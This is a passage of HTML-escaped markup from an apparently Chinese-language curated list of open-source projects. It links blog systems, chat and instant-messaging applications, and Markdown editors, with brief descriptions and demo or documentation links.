            &lt;a href=&quot;https://github.com/adlered/bolo-solo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;bolo-solo&lt;/a&gt; - 基于 &lt;code&gt;Java&lt;/code&gt; 的菠萝博客系统，简单易部署，精致主题，贴心服务，专为程序员设计。&lt;a href=&quot;https://demo.stackoverflow.wiki/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Naccl/NBlog&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;NBlog&lt;/a&gt; - &amp;nbsp;&lt;code&gt;Spring Boot&lt;/code&gt; + &lt;code&gt;Vue&lt;/code&gt; 前后端分离博客系统。&lt;a href=&quot;https://naccl.top/home&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/88250/symphony&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;symphony&lt;/a&gt; - &amp;nbsp;一款用 &lt;code&gt;Java&lt;/code&gt; 实现的现代化&lt;strong&gt;社区（论坛/问答/BBS/社交网络/博客）&lt;/strong&gt;系统平台。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Mereithhh/vanblog&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vanblog&lt;/a&gt; - 一款简洁实用优雅的个人博客系统。&lt;a href=&quot;https://blog-demo.mereith.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://vanblog.mereith.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/weiwosuoai/WeBlog&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;WeBlog&lt;/a&gt; - &lt;code&gt;SpringBoot&lt;/code&gt; + &lt;code&gt;Vue3.2&lt;/code&gt; + &lt;code&gt;Vite&lt;/code&gt; 前后端分离博客。&lt;a href=&quot;http://118.31.41.16/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/biaochenxuying/blog-vue-typescript&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;blog-vue-typescript&lt;/a&gt; - &lt;code&gt;Vue3&lt;/code&gt; + &lt;code&gt;TypeScript&lt;/code&gt; + &lt;code&gt;Vite2&lt;/code&gt; + &lt;code&gt;Vuex4&lt;/code&gt; + &lt;code&gt;Vue-Router4&lt;/code&gt; + &lt;code&gt;Element-UI-Plus&lt;/code&gt; 支持 &lt;code&gt;markdown&lt;/code&gt; 渲染的&lt;strong&gt;博客前台展示&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Veal98/Echo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Echo&lt;/a&gt; - 基于 &lt;code&gt;SpringBoot&lt;/code&gt; + &lt;code&gt;MyBatis&lt;/code&gt; + &lt;code&gt;MySQL&lt;/code&gt; + &lt;code&gt;Redis&lt;/code&gt; + &lt;code&gt;Kafka&lt;/code&gt; + &lt;code&gt;Elasticsearch&lt;/code&gt; + &lt;code&gt;Spring Security&lt;/code&gt; 前后端不分离的开源&lt;strong&gt;社区系统&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/quequnlong/shiyi-blog&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;shiyi-blog&lt;/a&gt; - 一款 &lt;code&gt;Vue&lt;/code&gt; + &lt;code&gt;SpringBoot&lt;/code&gt; 前后端分离的&lt;strong&gt;博客系统&lt;/strong&gt;。&lt;a href=&quot;https://www.shiyit.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/maliangnansheng/bbs-springboot&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;bbs-springboot&lt;/a&gt; - 仿掘金之【南生论坛】基于 &lt;code&gt;SpringBoot&lt;/code&gt; + &lt;code&gt;Vue&lt;/code&gt; 框架实现前后端分离。&lt;a href=&quot;https://bbs.nanshengbbs.top/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zhangyd-c/OneBlog&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;OneBlog&lt;/a&gt; - 一个简洁美观、功能强大并且自适应的 &lt;code&gt;Java&lt;/code&gt; 博客。&lt;a href=&quot;https://docs.zhyd.me/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/88250/solo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;solo&lt;/a&gt; - 一款专为程序员设计小而美的开源&lt;strong&gt;博客系统&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;聊天项目&quot;&gt;
    &lt;a href=&quot;?id=%e8%81%8a%e5%a4%a9%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;聊天项目&quot;&gt;聊天项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/lmxdawn/him-netty&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;him-netty&lt;/a&gt; 基于 &lt;code&gt;SpringBoot&lt;/code&gt; + &lt;code&gt;Netty&lt;/code&gt; + &lt;code&gt;Protobuf&lt;/code&gt; + &lt;code&gt;Vue&lt;/code&gt; 开源的 &lt;code&gt;H5&lt;/code&gt; &lt;strong&gt;即时聊天系统&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/JustCoding-Hai/subtlechat&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;subtlechat&lt;/a&gt; - 基于前后端分离，采用 &lt;code&gt;SpringBoot&lt;/code&gt; + &lt;code&gt;Vue&lt;/code&gt; 框架开发的&lt;strong&gt;网页版聊天室&lt;/strong&gt;。 使用了 &lt;code&gt;Spring Security&lt;/code&gt; 安全框架进行密码的加密存储和登录登出等逻辑的处理，以 &lt;code&gt;WebSocket&lt;/code&gt; + &lt;code&gt;Socket.js&lt;/code&gt; + &lt;code&gt;Stomp.js&lt;/code&gt; 实现消息的发送与接收、监听。搭建 &lt;code&gt;FastDFS&lt;/code&gt; 文件服务器用于保存图片，使用 &lt;code&gt;EasyExcel&lt;/code&gt; 导出数据，使用 &lt;code&gt;Vue.js&lt;/code&gt; 结合 &lt;code&gt;Element UI&lt;/code&gt; 进行显示弹窗和数据表格分页等功能，以及整个系统的界面进行 &lt;code&gt;UI&lt;/code&gt; 设计，并且使用 &lt;code&gt;MyBatis&lt;/code&gt; 结合数据库&lt;code&gt;MySQL&lt;/code&gt; 进行开发。&lt;a href=&quot;http://www.javahai.top/index.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://github.com/JustCoding-Hai/subtlechat/wiki&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Kanarienvogels/Chatroom&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Chatroom&lt;/a&gt; - 基于 &lt;code&gt;Spring&lt;/code&gt; + &lt;code&gt;Netty&lt;/code&gt; + &lt;code&gt;Websocket&lt;/code&gt; 实现的&lt;strong&gt;互联网实时聊天系统&lt;/strong&gt; 。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/msgbyte/tailchat&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tailchat&lt;/a&gt; - 一个基于 &lt;code&gt;React&lt;/code&gt; + &lt;code&gt;Typescript&lt;/code&gt; 的现代开源 &lt;code&gt;noIM&lt;/code&gt; 应用程序。&lt;a href=&quot;https://nightly.paw.msgbyte.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://tailchat.msgbyte.com/zh-Hans/docs/intro&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/trazyn/weweChat&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;weweChat&lt;/a&gt; - 基于 &lt;code&gt;React&lt;/code&gt;、&lt;code&gt;MobX&lt;/code&gt; 和 &lt;code&gt;Electron&lt;/code&gt; 构建的非官方&lt;strong&gt;微信客户端&lt;/strong&gt;。&lt;a href=&quot;https://web.wechat.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/velor2012/anonymous-chat-room&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;anonymous-chat-room&lt;/a&gt; - 基于 &lt;code&gt;livekit&lt;/code&gt; 和 &lt;code&gt;Next.js&lt;/code&gt; 的匿名聊天室。&lt;a href=&quot;https://chat.cwy666.eu.org/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/livekit-examples/meet&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;meet&lt;/a&gt; - 基于 &lt;code&gt;LiveKit Components&lt;/code&gt;、&lt;code&gt;LiveKit Cloud&lt;/code&gt; 和 &lt;code&gt;Next.js&lt;/code&gt; 构建的&lt;strong&gt;开源视频会议应用程序&lt;/strong&gt;。&lt;a href=&quot;https://meet.livekit.io/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wildfirechat/im-server&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;im-server&lt;/a&gt; - 即时通讯(IM)系统。&lt;a href=&quot;https://docs.wildfirechat.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/OpenVidu/openvidu&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;openvidu&lt;/a&gt; - 轻松创建自定义的视频会议。&lt;a href=&quot;https://openvidu.io/demos#0&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/openimsdk/open-im-server&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;open-im-server&lt;/a&gt; - 一个专门设计用于在应用程序中集成聊天、音视频通话、通知以及AI聊天机器人等通信功能的服务平台。&lt;a href=&quot;https://www.openim.io/zh/commercial&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://docs.openim.io/zh-Hans/guides/introduction&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/WuKongIM/WuKongIM&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;WuKongIM&lt;/a&gt; - 高性能通用实时通讯服务，支持即时通讯（聊天软件）(&lt;code&gt;IM&lt;/code&gt;、&lt;code&gt;Chat&lt;/code&gt;)、消息推送、消息中台、音视频信令、直播弹幕、客服系统、&lt;code&gt;AI&lt;/code&gt; 通讯、即时社区等场景。&lt;a href=&quot;http://imdemo.githubim.com/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://githubim.com/guide/guide.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/bluexsx/box-im&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;box-im&lt;/a&gt; - 一个仿微信的聊天工具。后端采用 &lt;code&gt;SpringBoot&lt;/code&gt; + &lt;code&gt;Netty&lt;/code&gt; 实现，&lt;code&gt;Web&lt;/code&gt; 端使用 &lt;code&gt;Vue&lt;/code&gt;，移动端使用 &lt;code&gt;Uniapp&lt;/code&gt;，支持私聊、群聊、离线消息、发送图片、文件、语音、&lt;code&gt;emoji&lt;/code&gt; 表情、视频聊天等功能。&lt;a href=&quot;https://www.boxim.online/#/login&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://www.yuque.com/u1475064/mufu2a&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/howcode/has-chat&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;has-chat&lt;/a&gt; - 一款前端基于 &lt;code&gt;Vue3&lt;/code&gt;,后端基于 &lt;code&gt;Express.js&lt;/code&gt; 的极简聊天应用。&lt;a href=&quot;https://gitee.com/link?target=https%3A%2F%2Fhowcode.online%2Fhaschat&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/lakaola/im-uniapp&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;im-uniapp&lt;/a&gt; - 聊天IM，精仿微信，支持单聊、群聊、朋友圈、摇一摇、附近的人、收藏、扫码、机器人、文字、图片、名片、实时音视频通话等功能。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/alyouge/V-IM&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;V-IM&lt;/a&gt; - 基于 &lt;code&gt;JS&lt;/code&gt; 的超轻量级聊天软件。&lt;a href=&quot;http://101.200.151.183/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/xchao/j-im&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;j-im&lt;/a&gt; - 用 &lt;code&gt;Java&lt;/code&gt; 语言开发的轻量、高性能、单机支持几十万至百万在线用户 IM.
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/JackJiang2011/MobileIMSDK&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MobileIMSDK&lt;/a&gt; - 一套专为移动端开发的原创 IM 通信层框架。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/likaia/chat-system&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;chat-system&lt;/a&gt; - 一个在线聊天系统，最大程度的还原了 &lt;code&gt;Mac&lt;/code&gt; 客户端 &lt;code&gt;QQ&lt;/code&gt;. &lt;a href=&quot;https://www.kaisir.cn/chat-system/index.html#/login&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/nongyehong/HuLa-IM-Tauri&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;HuLa-IM-Tauri&lt;/a&gt; - 一个基于&lt;code&gt;Tauri&lt;/code&gt;、&lt;code&gt;Vite 5&lt;/code&gt;、&lt;code&gt;Vue3&lt;/code&gt; 和 &lt;code&gt;TypeScript&lt;/code&gt; 构建的即时通讯系统。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/bailichen/vue-weixin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vue-weixin&lt;/a&gt; - &lt;code&gt;Vue2&lt;/code&gt; 全家桶仿&lt;strong&gt;微信App&lt;/strong&gt;项目，支持多人在线聊天和机器人聊天。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zongzibinbin/MallChat&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;MallChat&lt;/a&gt; - 一个既能购物又能聊天的电商系统。&lt;a href=&quot;https://mallchat.cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/howcode/aq-chat-server&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;aq-chat-server&lt;/a&gt; - 一个接入 &lt;code&gt;AI&lt;/code&gt; 的极速、便捷的匿名在线即时聊天(&lt;code&gt;IM&lt;/code&gt;).&lt;a href=&quot;https://www.aqchat.run/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://docs.aqchat.run/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/yinxin630/fiora&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;fiora&lt;/a&gt; - 一个有趣的开源聊天应用。&lt;a href=&quot;https://fiora.suisuijiang.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://yinxin630.github.io/fiora/zh-Hans/docs/getting-start/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;markdown-编辑器项目&quot;&gt;
    &lt;a href=&quot;?id=markdown-%e7%bc%96%e8%be%91%e5%99%a8%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;markdown-编辑器项目&quot;&gt;&lt;code&gt;Markdown&lt;/code&gt; 编辑器项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/purocean/yn&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;yn&lt;/a&gt; - 一款强大可扩展的 &lt;code&gt;Markdown&lt;/code&gt; 编辑器，为生产力而生。&lt;a href=&quot;https://demo.yank-note.com/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://github.com/purocean/yn/releases&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;下载地址&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/markmap/markmap&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;markmap&lt;/a&gt; - 将 &lt;code&gt;Markdown&lt;/code&gt; 转为可视化的&lt;strong&gt;思维导图&lt;/strong&gt;。&lt;a href=&quot;https://markmap.js.org/repl&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://markmap.js.org/docs/markmap&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/notable/notable&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;notable&lt;/a&gt; - 一款开源的高颜值、跨平台的 &lt;code&gt;Markdown&lt;/code&gt; 编辑器。&lt;a href=&quot;https://download.notable.app/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;下载地址&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/vnotex/vnote&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vnote&lt;/a&gt; - 专注于 &lt;code&gt;Markdown&lt;/code&gt; 的基于 &lt;code&gt;Qt&lt;/code&gt; 的开源免费的&lt;strong&gt;笔记应用&lt;/strong&gt;，提供一个拥有完美编辑体验的舒适的&lt;strong&gt;笔记平台&lt;/strong&gt;。&lt;a href=&quot;https://tamlok.gitee.io/vnote/zh_cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/barretlee/online-markdown&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;online-markdown&lt;/a&gt; - 一个专门针对微信公众号格式的在线 &lt;code&gt;Markdown&lt;/code&gt; 转换器。&lt;a href=&quot;http://md.barretlee.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Tencent/cherry-markdown&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;cherry-markdown&lt;/a&gt; - 一款 &lt;code&gt;JavaScript&lt;/code&gt; &lt;code&gt;Markdown&lt;/code&gt; &lt;strong&gt;编辑器&lt;/strong&gt;，具有开箱即用、轻量简洁、易于扩展等特点，它可以运行在浏览器或服务端( &lt;code&gt;NodeJs&lt;/code&gt;)。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://gitee.com/codeleilei/markdown2pdf&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;markdown2pdf&lt;/a&gt; - 使用 &lt;code&gt;Markdown&lt;/code&gt; 语法来构建 &lt;code&gt;Pdf&lt;/code&gt; 简历。&lt;a href=&quot;https://codeleilei.gitee.io/markdown2pdf/#/template&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Vanessa219/vditor&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;vditor&lt;/a&gt; - 一款浏览器端的 &lt;code&gt;Markdown&lt;/code&gt; 编辑器，支持所见即所得（富文本）、即时渲染（类似 &lt;code&gt;Typora&lt;/code&gt;）和分屏预览模式。&lt;a href=&quot;https://ld246.com/guide/markdown&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://b3log.org/vditor/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/joemccann/dillinger&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dillinger&lt;/a&gt; - 一个 &lt;code&gt;Markdown&lt;/code&gt; 编辑器。&lt;a href=&quot;https://dillinger.io/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/doocs/md&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;md&lt;/a&gt; - &lt;code&gt;WeChat Markdown Editor&lt;/code&gt; | 一款高度简洁的微信 &lt;code&gt;Markdown&lt;/code&gt; 编辑器：支持 &lt;code&gt;Markdown&lt;/code&gt; 语法、色盘取色、多图上传、一键下载文档、自定义 &lt;code&gt;CSS&lt;/code&gt; 样式、一键重置等特性。&lt;a href=&quot;https://doocs.github.io/md/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/nicejade/markdown-online-editor&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;markdown-online-editor&lt;/a&gt; - 基于 &lt;code&gt;Vue&lt;/code&gt;、&lt;code&gt;Vditor&lt;/code&gt; 所构建的在线 &lt;code&gt;Markdown&lt;/code&gt; 编辑器，支持绘制流程图、甘特图、时序图、任务列表、&lt;code&gt;echarts&lt;/code&gt; 图表、五线谱，以及 &lt;code&gt;PPT&lt;/code&gt; 预览、视频音频解析、&lt;code&gt;HTML&lt;/code&gt; 自动转换为 &lt;code&gt;Markdown&lt;/code&gt; 等功能。&lt;a href=&quot;https://markdown.lovejade.cn/?utm_source=github.com&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/laurent22/joplin&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;joplin&lt;/a&gt; - 一个开源的记事本应用程序。&lt;a href=&quot;https://joplinapp.org/cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/maqi1520/mdx-editor&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mdx-editor&lt;/a&gt; - 一个好用的微信排版编辑器，更是一个跨平台 &lt;code&gt;Markdown&lt;/code&gt; 笔记软件。&lt;a href=&quot;https://editor.runjs.cool/create&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Cveinnt/LetsMarkdown.com&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;LetsMarkdown.com&lt;/a&gt; - 一个轻量级的 &lt;code&gt;MarkDown&lt;/code&gt; 文档协作工具。&lt;a href=&quot;https://chencoding.top:8084/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
